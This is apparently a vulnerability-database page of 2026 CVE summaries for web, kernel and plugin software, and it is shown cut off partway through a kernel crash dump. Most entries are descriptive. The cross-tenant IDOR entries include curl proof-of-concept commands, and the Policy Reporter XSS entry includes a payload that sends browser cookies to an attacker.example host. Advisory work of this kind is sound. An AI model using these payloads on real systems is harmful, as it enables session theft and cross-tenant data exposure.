Skip to main content
CVE-2026-6860 MEDIUM POC PATCH GHSA This Month

Wildcard TLS certificate validation in Eclipse Vert.x allows remote attackers to bypass Server Name Indication (SNI) hostname verification by presenting arbitrary subdomains matching wildcard patterns, potentially disclosing sensitive server configuration and enabling certificate reuse across unintended service endpoints. The vulnerability affects Vert.x versions using unbounded SNI cache mechanisms without proper hostname validation constraints, and is fixed by implementing bounded LRU caching with proper synchronization and hostname matching enforcement.

Information Disclosure Vert X Red Hat
NVD GitHub VulDB
CVSS 4.0
6.9
EPSS
0.0%
CVE-2026-8031 MEDIUM POC This Month

Missing authentication in PicoTronica e-Clinic Healthcare System ECHS 5.7 allows remote unauthenticated attackers to access the /cdemos/echs/api/v2/patient-records API endpoint and retrieve sensitive patient information. Publicly available exploit code exists for this vulnerability. The vendor released patched version 5.7.1 to address the issue.

Authentication Bypass E Clinic Healthcare System Echs
NVD VulDB
CVSS 4.0
5.5
EPSS
0.0%
CVE-2026-8032 MEDIUM POC This Month

Hard-coded administrative credentials in PicoTronica e-Clinic Healthcare System ECHS 5.7 enable remote attackers to bypass authentication and gain privileged access to the healthcare management platform. The vulnerability resides in the /cdemos/echs/priv/echs.js file where the ADMIN_KEY parameter contains static credentials, allowing network-level exploitation without authentication (AV:N/PR:N). Public exploit documentation exists, though CISA KEV does not list active exploitation. EPSS data unavailable, but the combination of healthcare sector targeting, authentication bypass capability, and public POC elevates real-world risk despite moderate CVSS 7.3 scoring.

Authentication Bypass E Clinic Healthcare System Echs
NVD VulDB
CVSS 4.0
5.5
EPSS
0.0%
CVE-2026-8033 MEDIUM POC This Month

Information disclosure in PicoTronica e-Clinic Healthcare System ECHS 5.7 allows remote unauthenticated attackers to extract sensitive data via the Response Header Handler in the /cdemos/echs/api/v2/ endpoint. The vulnerability has been publicly disclosed with exploit code available, and a patch (version 5.7.1) has been released by the vendor.

Information Disclosure E Clinic Healthcare System Echs
NVD VulDB
CVSS 4.0
5.5
EPSS
0.0%
CVE-2026-44368 MEDIUM PATCH GHSA This Month

The `mul_mod` function implements multiplication via a binary expansion loop whose execution time depends on the Hamming weight of the second operand (the exponent). An attacker who can measure the time of secret‑sharing operations (e.g., via a remote service) could progressively recover the values of shares, ultimately leading to secret reconstruction. https://github.com/svvqt/pyquorum/releases/tag/v0.2.1

Information Disclosure
NVD GitHub
CVSS 4.0
6.9
EPSS
0.1%
CVE-2026-44437 MEDIUM PATCH GHSA This Month

Angular SSR applications fail to properly validate URL-encoded path traversal sequences in the X-Forwarded-Prefix header, allowing attackers to trigger open redirects or steer server-side HTTP requests to unintended endpoints when the application is configured to trust proxy headers and deployed behind an unsanitized proxy. Exploitation requires the upstream proxy to forward the X-Forwarded-Prefix header without stripping encoded dots (%2e%2e), and the Angular application must perform internal redirects or use relative URLs in server-side HttpClient requests. Vendor-released patches are available for all supported versions.

Open Redirect Path Traversal
NVD GitHub VulDB
CVSS 4.0
6.9
EPSS
0.0%
CVE-2026-44116 MEDIUM PATCH This Month

Server-side request forgery in OpenClaw before version 2026.4.22 allows remote attackers to bypass SSRF protection in the Zalo plugin's sendPhoto function by providing malicious photo URLs, enabling unauthorized access to internal resources. The vulnerability affects the Zalo Bot API integration and requires network access but involves time-based attack complexity; no public exploit code or active exploitation has been confirmed.

Authentication Bypass SSRF Openclaw
NVD GitHub VulDB
CVSS 4.0
6.9
EPSS
0.0%
CVE-2026-3291 MEDIUM This Month

Samsung Print Service Plugin for Android is potentially vulnerable to information disclosure when using an outdated version of the application via mobile devices. HP is releasing updates to mitigate these potential vulnerabilities.

HP Samsung Google Information Disclosure
NVD
CVSS 4.0
6.9
EPSS
0.0%
CVE-2026-41931 MEDIUM PATCH This Month

Vvveb before version 1.0.8.2 allows unauthenticated remote attackers to disclose sensitive server information including absolute file paths, internal class namespaces, line numbers, and source code excerpts by accessing the admin password-reset endpoint and triggering a fatal error caused by missing namespace imports. The debug exception handler renders full stack traces to unauthenticated requests, enabling reconnaissance attacks without authentication or user interaction. No active exploitation confirmed, but the vulnerability is easily discoverable and exploitable over the network.

Information Disclosure Vvveb
NVD GitHub VulDB
CVSS 4.0
6.9
EPSS
0.0%
CVE-2026-6863 MEDIUM PATCH This Month

Velociraptor versions prior to 0.76.4 allow authenticated users with reader role in the root organization to bypass cross-organization authorization controls via HTTP API GET requests, enabling them to read arbitrary files from other organizations regardless of their permissions in those target organizations. The vulnerability requires high privilege context (authenticated reader in root org) but has high confidentiality impact across organization boundaries. This is a horizontal privilege escalation affecting multi-tenant deployments where organizational isolation is a critical security boundary.

Authentication Bypass Suse
NVD
CVSS 3.1
6.8
EPSS
0.0%
CVE-2026-44305 MEDIUM PATCH GHSA This Month

Man-in-the-middle attacks can intercept LDAP credentials in Lemur when LDAP TLS is enabled because the authentication module globally disables TLS certificate verification using `ldap.OPT_X_TLS_NEVER`. Attackers positioned between Lemur and the LDAP server can capture plaintext usernames and passwords, modify LDAP group responses to grant admin access, and compromise the entire PKI infrastructure managed by Lemur. The vulnerability affects Lemur versions before 1.9.0 and is confirmed fixed in version 1.9.0.

Python RCE OpenSSL
NVD GitHub
CVSS 3.1
6.8
EPSS
0.0%
CVE-2026-44439 MEDIUM PATCH GHSA This Month

Server-side request forgery in Playwright Capture before version 1.39.6 allows remote attackers to access local files and internal network resources through browser-side redirection mechanisms when processing untrusted URLs. An attacker-controlled page can abuse window.location.href and similar navigation primitives to redirect the capture process to file:// URLs or private IP addresses, potentially leaking responses through screenshots, saved content, or logs. The vulnerability is mitigated by request routing checks introduced in version 1.39.6 that block secondary requests to local files, non-global IP addresses, and .local domains.

SSRF
NVD GitHub VulDB
CVSS 4.0
6.6
EPSS
0.1%
CVE-2026-35255 MEDIUM This Month

Malicious environment variable injection in Oracle Cloud Native Environment Command Line Interface v2.3.2 allows local authenticated users with low privileges to execute arbitrary code through user interaction, compromising systems running the affected CLI tool. The vulnerability requires local access and user action but results in high-impact code execution with full confidentiality and integrity compromise.

Oracle RCE Code Injection
NVD
CVSS 3.1
6.6
EPSS
0.0%
CVE-2026-44223 MEDIUM PATCH GHSA This Month

The `extract_hidden_states` speculative decoding proposer in vLLM returns a tensor with an incorrect shape after the first decode step, causing a `RuntimeError` that crashes the EngineCore process. The crash is triggered when any request in the batch uses sampling penalty parameters (`repetition_penalty`, `frequency_penalty`, or `presence_penalty`). A single request with a penalty parameter (e.g., `"repetition_penalty": 1.1`) is sufficient to crash the server. The crash is deterministic and immediate - no concurrency, race condition, or special workload is required. In vLLM v0.17.0, the `extract_hidden_states` proposer's `propose()` method returned `sampled_token_ids.unsqueeze(-1)`, producing a tensor of shape `(batch_size, 1)`. In [PR #37013](https://github.com/vllm-project/vllm/pull/37013) (first released in v0.18.0), the KV connector interface was refactored out of `propose()`. The return type changed from `tuple[Tensor, KVConnectorOutput | None]` to `Tensor`, and the `.unsqueeze(-1)` call was removed along with the KV connector output: ```python return sampled_token_ids.unsqueeze(-1), kv_connector_output # shape (batch_size, 1) return sampled_token_ids # shape (batch_size, 2) after first decode step ``` The refactor missed that `sampled_token_ids` changed semantics between the first and subsequent decode steps. After the first decode step, the rejection sampler allocates its output as `(batch_size, max_spec_len + 1)`. With `num_speculative_tokens=1`, this produces shape `(batch_size, 2)` instead of the expected `(batch_size, 1)`, causing a broadcast shape mismatch during penalty application. Any vLLM deployment between v0.18.0 and v0.19.1 (inclusive) configured with `extract_hidden_states` speculative decoding is affected. A single API request containing any penalty parameter immediately and permanently crashes the EngineCore process, resulting in complete loss of service availability. Fixed in [PR #38610](https://github.com/vllm-project/vllm/pull/38610), first included in vLLM v0.20.0. The fix slices the return value to `sampled_token_ids[:, :1]`, ensuring the correct `(batch_size, 1)` shape regardless of the rejection sampler's output dimensions. - Upgrade to vLLM v0.20.0 or later. - If upgrading is not possible, avoid using `extract_hidden_states` as the speculative decoding method on affected versions. - Alternatively, reject or strip penalty parameters (`repetition_penalty`, `frequency_penalty`, `presence_penalty`) from incoming requests at an API gateway before they reach vLLM.

Python Denial Of Service
NVD GitHub VulDB
CVSS 3.1
6.5
EPSS
0.0%
CVE-2026-43975 MEDIUM PATCH This Month

Path traversal vulnerability in Apache Wicket's FolderUploadsFileManager allows unauthenticated attackers to read arbitrary files or write files outside the intended upload directory by exploiting unsanitized uploadFieldId and clientFileName parameters. Affected versions 8.0.0-8.17.0, 9.0.0-9.22.0, and 10.0.0-10.8.0 are vulnerable to remote file access and modification without authentication or user interaction. Vendor-released patch available in version 10.9.0.

Apache Path Traversal
NVD GitHub VulDB
CVSS 3.1
6.5
EPSS
0.0%
CVE-2026-20168 MEDIUM This Month

Authenticated remote attackers with low privileges can read arbitrary files via insufficient access controls in the web-based management interface of Cisco IoT Field Network Director. Exploitation requires valid login credentials and submission of crafted input through the management UI; successful attacks result in unauthorized file disclosure but do not enable modification or system disruption. No public exploit code or active exploitation has been identified at time of analysis.

Information Disclosure Cisco Cisco Iot Field Network Director Iot Fnd
NVD
CVSS 3.1
6.5
EPSS
0.0%
CVE-2026-44423 MEDIUM PATCH GHSA This Month

{ session, err := s.store.SessionResolve(ctx, store.SessionUIDResolver, string(uid)) // ⚠️ missing: s.store.Options().InNamespace(tenant) ... } ``` The `Authorize` middleware only verifies presence of a tenant in the context, not ownership of the requested session. Pre-requisite: attacker has any valid user account and has obtained a session UID from the victim tenant (UIDs may leak via logs, shared session recordings, UI URLs, or through the device IDOR in the companion advisory since sessions reference devices by UID). ```bash ATTACKER_TOKEN=$(curl -s -X POST http://target/api/login \ -H 'Content-Type: application/json' \ -d '{"username":"attacker","password":"..."}' | jq -r .token) curl -i "http://target/api/sessions/<victim-session-uid>" \ -H "Authorization: Bearer $ATTACKER_TOKEN" ``` - Cross-tenant disclosure of SSH session data: target username, device UID, remote IP, authenticated status, session type, terminal, position (geolocation), started_at / last_seen timestamps. - Enables reconnaissance of other tenants' active users and systems; combined with session recording features, can enable deeper recon. `api/services/session.go` - apply `InNamespace` in `GetSession`: ```go func (s *service) GetSession(ctx context.Context, uid models.UID) (*models.Session, error) { tenant := gateway.TenantFromContext(ctx) opts := []store.QueryOption{} if tenant != nil { opts = append(opts, s.store.Options().InNamespace(tenant.ID)) } session, err := s.store.SessionResolve(ctx, store.SessionUIDResolver, string(uid), opts...) ... } ```

Authentication Bypass
NVD GitHub VulDB
CVSS 3.1
6.5
EPSS
0.0%
CVE-2026-44424 MEDIUM PATCH GHSA This Month

{ device, err := s.store.DeviceResolve(ctx, store.DeviceUIDResolver, string(uid)) // ⚠️ missing: s.store.Options().InNamespace(tenant) ... } ``` Compare with `DeleteDevice` in the same file (line 137) which correctly applies `InNamespace(tenant)`. The `Authorize` middleware (`api/routes/middleware/authorize.go:12-27`) only checks that a tenant is present in the context - not that the resource belongs to that tenant. Pre-requisite: attacker has any valid user account and knows a target `tenant_id` (UUIDs frequently leak via UI URLs, email invites, support channels, or prior namespace membership). ```bash ATTACKER_TOKEN=$(curl -s -X POST http://target/api/login \ -H 'Content-Type: application/json' \ -d '{"username":"attacker","password":"..."}' | jq -r .token) TARGET_TENANT="<victim-tenant-uuid>" VICTIM_UID=$(curl -s -X POST http://target/api/devices/auth \ -H 'Content-Type: application/json' \ -d "{ \"info\":{\"id\":\"x\",\"pretty_name\":\"x\",\"version\":\"v0.24.1\",\"arch\":\"amd64\",\"platform\":\"docker\"}, \"hostname\":\"poc\", \"identity\":{\"mac\":\"aa:bb:cc:dd:ee:ff\"}, \"public_key\":\"-----BEGIN RSA PUBLIC KEY-----\\nx\\n-----END RSA PUBLIC KEY-----\", \"tenant_id\":\"$TARGET_TENANT\" }" | jq -r .uid) curl -i "http://target/api/devices/$VICTIM_UID" \ -H "Authorization: Bearer $ATTACKER_TOKEN" ``` - Cross-tenant disclosure of device metadata: hostname, MAC, OS fingerprint, public SSH key, namespace name, last-seen timestamp, remote address. - Enables namespace enumeration, device inventory reconnaissance of other tenants, and targeted follow-up attacks. In `api/services/device.go` `GetDevice`, extract tenant from context and apply `InNamespace`: ```go func (s *service) GetDevice(ctx context.Context, uid models.UID) (*models.Device, error) { tenant := gateway.TenantFromContext(ctx) opts := []store.QueryOption{} if tenant != nil { opts = append(opts, s.store.Options().InNamespace(tenant.ID)) } device, err := s.store.DeviceResolve(ctx, store.DeviceUIDResolver, string(uid), opts...) ... } ```

Authentication Bypass Docker
NVD GitHub
CVSS 3.1
6.5
EPSS
0.0%
CVE-2026-7924 MEDIUM PATCH This Month

Uninitialized memory use in Dawn (GPU abstraction layer) in Google Chrome prior to version 148.0.7778.96 allows remote attackers to read potentially sensitive information from process memory by opening a crafted HTML page. The vulnerability requires user interaction (clicking/viewing the malicious page) but no authentication, and has a high confidentiality impact. Chromium security team classified this as high severity; no public exploit code or active exploitation has been confirmed at time of analysis.

Information Disclosure Google Red Hat Suse Chrome
NVD VulDB
CVSS 3.1
6.5
EPSS
0.0%
CVE-2026-7982 MEDIUM PATCH This Month

Uninitialized Use in WebCodecs in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Medium)

Information Disclosure Google Red Hat Suse Chrome
NVD
CVSS 3.1
6.5
EPSS
0.0%
CVE-2026-44456 MEDIUM PATCH GHSA This Month

Hono's bodyLimit() middleware fails to reliably enforce maxSize restrictions on chunked or unknown-length HTTP requests (Transfer-Encoding: chunked), allowing oversized payloads to reach application handlers and return HTTP 200 instead of 413 Payload Too Large. Versions prior to 4.12.16 are vulnerable when handlers do not fully read the request body, read only initial chunks before returning, or catch and suppress read errors. This bypasses the documented guarantee that oversized requests are rejected before business logic execution.

Denial Of Service Information Disclosure
NVD GitHub
CVSS 3.1
6.5
EPSS
0.0%
CVE-2026-5753 MEDIUM This Month

Missing authorization in All-in-One WP Migration Unlimited Extension for WordPress versions up to 2.83 allows authenticated subscribers to create scheduled export jobs without capability verification, enabling attackers to exfiltrate full site backups by redirecting notifications to attacker-controlled email addresses and leveraging exposed backup filenames for download. This results in complete site data disclosure including sensitive information accessible to low-privilege authenticated users.

Authentication Bypass Information Disclosure WordPress
NVD VulDB
CVSS 3.1
6.5
EPSS
0.0%
CVE-2026-20169 MEDIUM This Month

Cisco IoT Field Network Director's web-based management interface allows authenticated remote attackers with low privileges to execute arbitrary commands and access files on managed routers via insufficient input validation in the web interface. The vulnerability enables file creation, deletion, read operations, and execution of limited commands in user EXEC mode on remote routers. CVSS 6.4 (medium severity); no active exploitation or public POC identified at time of analysis.

Command Injection Cisco Cisco Iot Field Network Director Iot Fnd
NVD VulDB
CVSS 3.1
6.4
EPSS
0.1%
CVE-2026-7457 MEDIUM This Month

Stored cross-site scripting in LatePoint calendar booking plugin for WordPress versions up to 5.5.0 allows authenticated customers to inject malicious scripts via unsanitized profile fields (first name, last name, phone, notes) that execute in administrators' browsers when notification templates are previewed. Exploitation requires customer-level access and admin interaction to preview a notification template, but achieves code execution in a high-privilege context (administrator or agent browser session) with scope change from single user to multiple users.

XSS WordPress
NVD VulDB
CVSS 3.1
6.4
EPSS
0.1%
CVE-2026-6672 MEDIUM This Month

Stored Cross-Site Scripting in SliceWP Affiliates plugin for WordPress (versions up to 1.2.7) allows authenticated contributors and above to inject arbitrary JavaScript via unsanitized shortcode attributes in the 'slicewp_affiliate_url' shortcode. The injected scripts execute in the browsers of all users accessing the affected page, enabling account compromise, credential theft, or malware distribution. No public exploit code or active exploitation has been identified, but the vulnerability is straightforward to exploit given the low attack complexity and requires only contributor-level WordPress access.

XSS WordPress
NVD VulDB
CVSS 3.1
6.4
EPSS
0.0%
CVE-2026-8026 MEDIUM This Month

Information disclosure in FlowiseAI Flowise up to version 3.0.12 allows remote attackers to extract sensitive data through the Login function in the API Response Handler component. The vulnerability requires high attack complexity and is difficult to exploit, but successful exploitation results in confidentiality impact without authentication requirements. No public confirmation of active exploitation has been identified at time of analysis.

Information Disclosure Flowise
NVD VulDB GitHub
CVSS 4.0
6.3
EPSS
0.0%
CVE-2026-44117 MEDIUM PATCH This Month

Server-side request forgery in OpenClaw before 2026.4.20 allows unauthenticated remote attackers to relay unintended requests through QQBot direct media upload endpoints (uploadC2CMedia and uploadGroupMedia) by sending crafted image URLs that bypass SSRF protections. The vulnerability affects QQBot outbound media handling and does not expose arbitrary local files, but could allow attackers to make configured QQBot media delivery requests to unintended destinations.

SSRF Openclaw
NVD GitHub
CVSS 4.0
6.3
EPSS
0.0%
CVE-2026-7971 MEDIUM PATCH This Month

Inappropriate implementation in ORB in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to bypass site isolation via a crafted HTML page. (Chromium security severity: Medium)

Privilege Escalation Google Red Hat Suse Chrome
NVD VulDB
CVSS 3.1
6.3
EPSS
0.0%
CVE-2026-8010 MEDIUM PATCH This Month

Insufficient validation of untrusted input in SiteIsolation in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: Low)

Authentication Bypass Google Red Hat Suse Chrome
NVD VulDB
CVSS 3.1
6.3
EPSS
0.0%
CVE-2026-7977 MEDIUM PATCH This Month

Inappropriate implementation in Canvas in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to bypass same origin policy via a crafted HTML page. (Chromium security severity: Medium)

Privilege Escalation Google Red Hat Suse Chrome
NVD VulDB
CVSS 3.1
6.3
EPSS
0.0%
CVE-2026-6420 MEDIUM PATCH GHSA This Month

Keylime verifier uses a hardcoded challenge nonce instead of cryptographically random values for TPM quote attestation, allowing local attackers with root access on enrolled machines to capture valid quotes and replay them to bypass detection after system compromise. The vulnerability affects only push-model deployments and requires root privileges on the monitored endpoint; exploitation enables information disclosure and system integrity evasion with CVSS 6.3 severity.

Information Disclosure Red Hat Enterprise Linux 10 Red Hat Enterprise Linux 9
NVD VulDB GitHub
CVSS 3.1
6.3
EPSS
0.0%
CVE-2026-44301 MEDIUM PATCH GHSA This Month

Hugo static site generator versions 0.43.0 through 0.160.x allow unrestricted file system access when building sites with Node-based asset pipelines (PostCSS, Babel, TailwindCSS), enabling arbitrary code execution through these tools to read or write files outside the project directory. The vulnerability affects only users who deploy Node asset pipelines; those building trusted sites or not using these pipelines are unaffected. A vendor-released patch in v0.161.0 enforces Node's permission model with strict filesystem defaults.

Path Traversal
NVD GitHub VulDB
CVSS 4.0
6.2
EPSS
0.1%
CVE-2026-42184 MEDIUM PATCH GHSA This Month

Origin confusion in Tauri's is_local_url() function on Windows and Android allows remote attackers to invoke local-only IPC commands by hosting content on a domain whose first subdomain matches the application's custom URI scheme. An attacker can register a domain like http://app.evil.com/ to bypass origin validation when the target application uses an app:// custom protocol, gaining unauthorized access to backend functionality intended only for the application's own frontend. A public proof-of-concept demonstrates successful command invocation through this bypass.

Google SSRF Microsoft
NVD GitHub
CVSS 4.0
6.1
EPSS
0.0%
CVE-2026-7953 MEDIUM PATCH This Month

Unvalidated Omnibox input in Google Chrome prior to version 148.0.7778.96 enables remote attackers to inject arbitrary scripts and HTML (universal XSS) via malicious network traffic, affecting users who click on crafted links. The vulnerability requires user interaction but crosses security boundaries due to its scope impact. No active exploitation has been publicly confirmed, though a patch is available from Google.

Code Injection Google Red Hat Suse Chrome
NVD VulDB
CVSS 3.1
6.1
EPSS
0.0%
CVE-2026-44245 MEDIUM PATCH GHSA This Month

{{ }} interpolation provides. The PropertyCard.vue component uses v-html for the else branch of the URL check, meaning any non-URL string value flows directly into the DOM as HTML. The isURL() guard only filters values that parse as http: or https: URLs, so any HTML payload not starting with those schemes (e.g., `<img src=x onerror=alert(1)>` padded to exceed 75 chars) bypasses it entirely. The data originates from Kubernetes PolicyReport .results[].properties fields, which are arbitrary string maps populated by policy engines and potentially by any principal with write access to PolicyReport objects in the cluster. No DOMPurify or equivalent HTML sanitization library is present anywhere in the frontend codebase, confirming there is no compensating control between the API response and the sink. This vulnerability was reproduced on the latest policy reporter UI version - 2.5.1. Prerequisites: Kubernetes write access to PolicyReport resources in the target cluster (e.g., via a policy engine service account or direct kubectl access) Create a Kubernetes PolicyReport resource with a crafted property value longer than 75 characters. When an authenticated Policy Reporter UI user browses to the affected namespace and expands the result row containing this property, the injected script executes in their browser. ```bash kubectl apply -f - <<'EOF' apiVersion: [wgpolicyk8s.io/v1alpha2](http://wgpolicyk8s.io/v1alpha2) kind: PolicyReport metadata: name: xss-poc namespace: default results: - message: "test" policy: xss-test-policy rule: check-rule result: fail properties: advisory: "<img src=x onerror=\"fetch('[https://attacker.example/c?c='+document.cookie](https://attacker.example/c?c=%27+document.cookie))\"> padding padding padding" EOF ``` <img width="1562" height="1061" alt="Снимок экрана - 2026-04-21 в 10 52 17" src="https://github.com/user-attachments/assets/fe542ccb-1662-44cb-802f-7998aa145db7" /> <img width="1041" height="939" alt="Снимок экрана - 2026-04-21 в 10 51 44" src="https://github.com/user-attachments/assets/bc07cf20-aea5-4a90-838f-c428d88a92b7" /> XSS

Kubernetes XSS
NVD GitHub
CVSS 3.1
6.1
EPSS
0.0%
CVE-2026-42509 MEDIUM PATCH This Month

Cross-site scripting (XSS) vulnerability in Apache Wicket allows unauthenticated remote attackers to inject malicious JavaScript through crafted strings that break out of JavaScript sequence contexts. Affected versions include Wicket 8.0.0-8.17.0, 9.0.0-9.22.0, and 10.0.0-10.8.0. User interaction (e.g., clicking a malicious link) is required for exploitation. EPSS score of 0.03% (8th percentile) indicates low empirical exploitation probability despite network-accessible attack vector.

XSS Apache
NVD VulDB
CVSS 3.1
6.1
EPSS
0.0%
CVE-2026-35254 MEDIUM PATCH This Month

Oracle OCI CLI version 3.77 allows local attackers with user interaction to place imported files outside the intended directory, compromising file integrity and enabling potential code execution or data exfiltration. The vulnerability requires local access and user interaction but carries high integrity impact through arbitrary file placement. No active exploitation or public exploit code has been identified at the time of analysis.

Oracle Path Traversal Suse
NVD VulDB
CVSS 3.1
6.1
EPSS
0.0%
CVE-2026-43583 MEDIUM PATCH This Month

OpenClaw versions 2026.4.10 through 2026.4.13 fail to persist session context when recovering queued outbound media after service restart, allowing authenticated attackers to bypass group tool policy enforcement and weaken channel media restrictions. The vulnerability affects the delivery queue recovery mechanism, which replays queued messages without the original requester's session context needed for policy validation. Exploitation requires authenticated access and prior knowledge of queued delivery entries, with CVSS 6.0 and confirmed patch available in version 2026.4.14.

Authentication Bypass Openclaw
NVD GitHub
CVSS 4.0
6.0
EPSS
0.0%
CVE-2026-43579 MEDIUM PATCH This Month

OpenClaw before version 2026.4.10 allows operators with write permissions to persist Nostr profile configuration without requiring admin authority through unprotected HTTP mutation endpoints. Attackers holding the operator.write scope can modify profile settings via PUT and POST routes that should require operator.admin scope, enabling unauthorized configuration changes. This is a privilege escalation vulnerability affecting the Nostr plugin HTTP API layer.

Authentication Bypass Openclaw
NVD GitHub
CVSS 4.0
6.0
EPSS
0.0%
CVE-2026-42545 MEDIUM PATCH GHSA This Month

Granian worker process aborts when a WSGI application returns invalid HTTP response header names or values due to unhandled panic in the header conversion path. An attacker who can influence WSGI application output, such as by injecting user-controlled data into response headers like Location or Content-Disposition, can trigger worker process denial of service. The vulnerability affects Granian versions 0.2.0 through 2.7.3; patch available in version 2.7.4. Proof of concept demonstrates crashes via headers containing spaces, CRLF injection, or null bytes.

Python Denial Of Service
NVD GitHub
CVSS 3.1
5.9
EPSS
0.0%
CVE-2026-44363 MEDIUM PATCH GHSA This Month

An unsafe remote resource fetching vulnerability existed in MISP Modules expansion modules. The html_to_markdown module accepted arbitrary HTTP(S) URLs without sufficient validation, which could allow Server-Side Request Forgery against loopback, private, or link-local network resources. Additionally, the qrcode module disabled TLS certificate verification when retrieving remote images, exposing requests to potential man-in-the-middle interception or response tampering. The issue was fixed by validating URL schemes, blocking local and private address ranges, resolving hostnames before fetching, enforcing request timeouts, and re-enabling TLS certificate verification. As reported by Bilal Teke.

SSRF
NVD GitHub VulDB
CVSS 4.0
5.8
EPSS
0.0%
CVE-2026-43252 MEDIUM PATCH This Month

Denial of service via kernel warning in MPTCP path manager occurs when combining endpoint removal with fullmesh and flag-setting operations through netlink in the Linux kernel. A local attacker with low privileges can trigger a WARNING in net/mptcp/pm_kernel.c:1074 by sending a crafted sequence of netlink commands, causing the system to emit a kernel warning and potentially become unstable. No known public exploit code exists, but the low CVSS (5.5) and minimal EPSS (0.03%) indicate this is a local DoS with limited real-world impact.

Information Disclosure Ubuntu Debian Linux Red Hat +1
NVD VulDB
CVSS 3.1
5.5
EPSS
0.0%
CVE-2025-71295 MEDIUM PATCH This Month

In the Linux kernel, the following vulnerability has been resolved: fs/buffer: add alert in try_to_free_buffers() for folios without buffers try_to_free_buffers() can be called on folios with no buffers attached when filemap_release_folio() is invoked on a folio belonging to a mapping with AS_RELEASE_ALWAYS set but no release_folio operation defined. In such cases, folio_needs_release() returns true because of the AS_RELEASE_ALWAYS flag, but the folio has no private buffer data. This causes try_to_free_buffers() to call drop_buffers() on a folio with no buffers, leading to a null pointer dereference. Adding a check in try_to_free_buffers() to return early if the folio has no buffers attached, with WARN_ON_ONCE() to alert about the misconfiguration. This provides defensive hardening.

Denial Of Service Null Pointer Dereference Linux Red Hat Suse
NVD VulDB
CVSS 3.1
5.5
EPSS
0.0%
CVE-2025-71292 MEDIUM PATCH This Month

Integer wraparound in the Linux kernel JFS (Journaled File System) `jfs_rename` function can be triggered by a local low-privileged user to cause a kernel warning and denial of service. When a directory's hard link count (nlink) is already at its maximum value (-1 as an unsigned overflow scenario), performing an in-place rename of a child subdirectory increments nlink and then decrements it, wrapping the counter to zero and triggering a `drop_nlink` kernel warning. The vulnerability affects a wide range of stable kernel branches from 5.10 through 6.19; no public exploit code exists and CISA has not listed this in KEV, making active exploitation unlikely but not impossible in multi-tenant or container environments where JFS-mounted filesystems are accessible to low-privilege users.

Buffer Overflow Linux
NVD VulDB
CVSS 3.1
5.5
EPSS
0.0%
CVE-2025-71291 MEDIUM PATCH This Month

Null pointer dereference in the Linux kernel's bcm_vk misc driver allows a local authenticated attacker to crash the kernel, resulting in a denial of service. The bcm_vk_read() function checks whether the 'entry' pointer is NULL but fails to prevent subsequent dereferences of that pointer when rc is set to -EMSGSIZE, leading to a kernel panic. No public exploit exists and the vulnerability is not listed in CISA KEV; however, vendor-released patches are available across multiple stable kernel branches, and Red Hat and SUSE have tagged this for attention in their ecosystems.

Denial Of Service Null Pointer Dereference Linux
NVD VulDB
CVSS 3.1
5.5
EPSS
0.0%
CVE-2025-71288 MEDIUM PATCH This Month

Resource leak in the Linux kernel's mtk-smi (MediaTek System Memory Interface) driver allows a local, low-privileged attacker on MediaTek SoC-based systems to cause a denial of service by exhausting kernel device references. The driver fails to call put_device() on the SMI device reference obtained during common probe when late probe failure (e.g., -EPROBE_DEFER) or driver unbind occurs, leaving dangling references that accumulate over repeated cycles. No public exploit identified at time of analysis and EPSS at 0.02% (7th percentile) indicates very low exploitation probability; patches are available across multiple stable branches.

Information Disclosure Linux
NVD VulDB
CVSS 3.1
5.5
EPSS
0.0%
CVE-2025-71287 MEDIUM PATCH This Month

Device reference leak in the Linux kernel's MediaTek SMI (mtk-smi) memory driver can cause resource exhaustion and denial of service on affected MediaTek SoC-based systems. The flaw exists in the larb (Local Arbiter) probe path, where a reference acquired during SMI device lookup is never released when late probe failure occurs (e.g., probe deferral) or when the driver is unbound - leaving the kernel device struct's reference count permanently inflated. With EPSS at 0.02% (7th percentile), no KEV listing, and no public exploit identified at time of analysis, real-world exploitation risk is very low and narrowly scoped to hardware running MediaTek SoCs.

Information Disclosure Linux
NVD VulDB
CVSS 3.1
5.5
EPSS
0.0%
CVE-2026-43277 MEDIUM PATCH This Month

In the Linux kernel, the following vulnerability has been resolved: APEI/GHES: ensure that won't go past CPER allocated record The logic at ghes_new() prevents allocating too large records, by checking if they're bigger than GHES_ESTATUS_MAX_SIZE (currently, 64KB). Yet, the allocation is done with the actual number of pages from the CPER bios table location, which can be smaller. Yet, a bad firmware could send data with a different size, which might be bigger than the allocated memory, causing an OOPS: Unable to handle kernel paging request at virtual address fff00000f9b40000 Mem abort info: ESR = 0x0000000096000007 EC = 0x25: DABT (current EL), IL = 32 bits SET = 0, FnV = 0 EA = 0, S1PTW = 0 FSC = 0x07: level 3 translation fault Data abort info: ISV = 0, ISS = 0x00000007, ISS2 = 0x00000000 CM = 0, WnR = 0, TnD = 0, TagAccess = 0 GCS = 0, Overlay = 0, DirtyBit = 0, Xs = 0 swapper pgtable: 4k pages, 52-bit VAs, pgdp=000000008ba16000 [fff00000f9b40000] pgd=180000013ffff403, p4d=180000013fffe403, pud=180000013f85b403, pmd=180000013f68d403, pte=0000000000000000 Internal error: Oops: 0000000096000007 [#1] SMP Modules linked in: CPU: 0 UID: 0 PID: 303 Comm: kworker/0:1 Not tainted 6.19.0-rc1-00002-gda407d200220 #34 PREEMPT Hardware name: QEMU QEMU Virtual Machine, BIOS unknown 02/02/2022 Workqueue: kacpi_notify acpi_os_execute_deferred pstate: 214020c5 (nzCv daIF +PAN -UAO -TCO +DIT -SSBS BTYPE=--) pc : hex_dump_to_buffer+0x30c/0x4a0 lr : hex_dump_to_buffer+0x328/0x4a0 sp : ffff800080e13880 x29: ffff800080e13880 x28: ffffac9aba86f6a8 x27: 0000000000000083 x26: fff00000f9b3fffc x25: 0000000000000004 x24: 0000000000000004 x23: ffff800080e13905 x22: 0000000000000010 x21: 0000000000000083 x20: 0000000000000001 x19: 0000000000000008 x18: 0000000000000010 x17: 0000000000000001 x16: 00000007c7f20fec x15: 0000000000000020 x14: 0000000000000008 x13: 0000000000081020 x12: 0000000000000008 x11: ffff800080e13905 x10: ffff800080e13988 x9 : 0000000000000000 x8 : 0000000000000000 x7 : 0000000000000001 x6 : 0000000000000020 x5 : 0000000000000030 x4 : 00000000fffffffe x3 : 0000000000000000 x2 : ffffac9aba78c1c8 x1 : ffffac9aba76d0a8 